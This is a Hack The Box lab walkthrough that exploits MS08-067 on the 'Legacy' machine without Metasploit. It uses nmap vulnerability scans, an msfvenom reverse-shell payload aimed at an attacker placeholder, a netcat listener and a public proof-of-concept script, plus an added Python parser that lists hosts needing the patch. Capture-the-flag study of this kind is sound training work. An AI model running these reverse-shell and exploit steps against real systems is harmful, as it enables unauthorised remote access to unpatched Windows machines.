Hack The Box - Legacy Walkthrough without Metasploit

Enumeration

We start by using nmap to enumerate the box with the following flags:

-sC Script scan, equivalent to --script=default

-sV Service version info

-A Enable OS detection, version detection, script scanning, and traceroute

nmap -sC -sV -A 10.10.10.4

SMB port 445 is open, so we can run nmap again with the vulnerability scripts on that port; the OS detection result will be useful later.

nmap --script smb-vuln* -p445 10.10.10.4

Since there are multiple smb-vuln scripts, the trailing * runs all of them against port 445 of the victim box.

The box is vulnerable to CVE-2008-4250 (MS08-067), which affects the operating systems that our enumeration flagged as most likely running on the victim.
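To turn that scan result into a remediation record rather than reading it by eye, here is an added Python example (not part of the original walkthrough) that parses host-script output of the kind `nmap --script smb-vuln*` prints and keeps only the findings whose state is VULNERABLE. The sample scan text is constructed in the shape of nmap's NSE output; its exact layout is an assumption and real output may differ slightly.

```python
import re

# Constructed sample in the shape of nmap NSE host-script output (layout assumed,
# not real output captured from the box).
SAMPLE_OUTPUT = """\
Nmap scan report for 10.10.10.4
PORT    STATE SERVICE      VERSION
445/tcp open  microsoft-ds Windows XP microsoft-ds
Host script results:
| smb-vuln-ms08-067:
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|_smb-vuln-ms10-054: false
| smb-vuln-ms10-061:
|     State: NOT VULNERABLE
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
SCRIPT_RE = re.compile(r"^\|_?\s*(smb-vuln-[\w-]+):")
STATE_RE = re.compile(r"State:\s*(.+?)\s*$")
CVE_RE = re.compile(r"CVE-\d{4}-\d+")


def parse_smb_vuln(output):
    """Return one dict per smb-vuln script block: host, script, state, cves."""
    findings, host, current = [], None, None
    for line in output.splitlines():
        m = HOST_RE.match(line)
        if m:  # new host section: remember the host, reset the block context
            host, current = m.group(1), None
            continue
        m = SCRIPT_RE.match(line)
        if m:  # start of a script result block
            current = {"host": host, "script": m.group(1), "state": None, "cves": []}
            findings.append(current)
            continue
        if current is None or not line.startswith("|"):
            continue  # not inside a script block
        m = STATE_RE.search(line)
        if m:
            current["state"] = m.group(1)
        current["cves"].extend(CVE_RE.findall(line))
    return findings


def vulnerable_findings(output):
    """Keep only the blocks nmap reports as VULNERABLE, e.g. for a patch queue."""
    return [f for f in parse_smb_vuln(output) if f["state"] == "VULNERABLE"]
```

Feeding it the saved output of the scan above yields one record per host and script, so a whole subnet's results can be reduced to the hosts that still need the MS08-067 patch.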

Finding the PoC

With a quick Google search we can find this GitHub repository:

https://github.com/andyacer/ms08_067/

It is a useful resource: we can place our own msfvenom payload in it and execute it to exploit the vulnerability.

Modifying the PoC

This generates a reverse TCP shell payload for 32-bit Windows, excluding the bad characters listed with the -b flag.

msfvenom -p windows/shell_reverse_tcp LHOST=<Attackers-IP> LPORT=<Attackers-Port> EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows

This is the part of the exploit that we replace with our own msfvenom payload.

Executing the PoC

First, set up a netcat listener in order to catch the reverse TCP shell.

nc -nvlp 443

We might run into this problem while trying to execute the exploit:

To fix it, we just need to install Impacket and PyCrypto.

For Impacket:

git clone https://github.com/SecureAuthCorp/impacket
cd impacket
pip install .

For PyCrypto:

pip install pycrypto

Once that is fixed, we can execute the script with the required arguments.

According to our previous enumeration, the box is most likely Windows XP SP3, so we tested with target option 6.

python ms08_067_2018.py 10.10.10.4 6 445

Pwnd
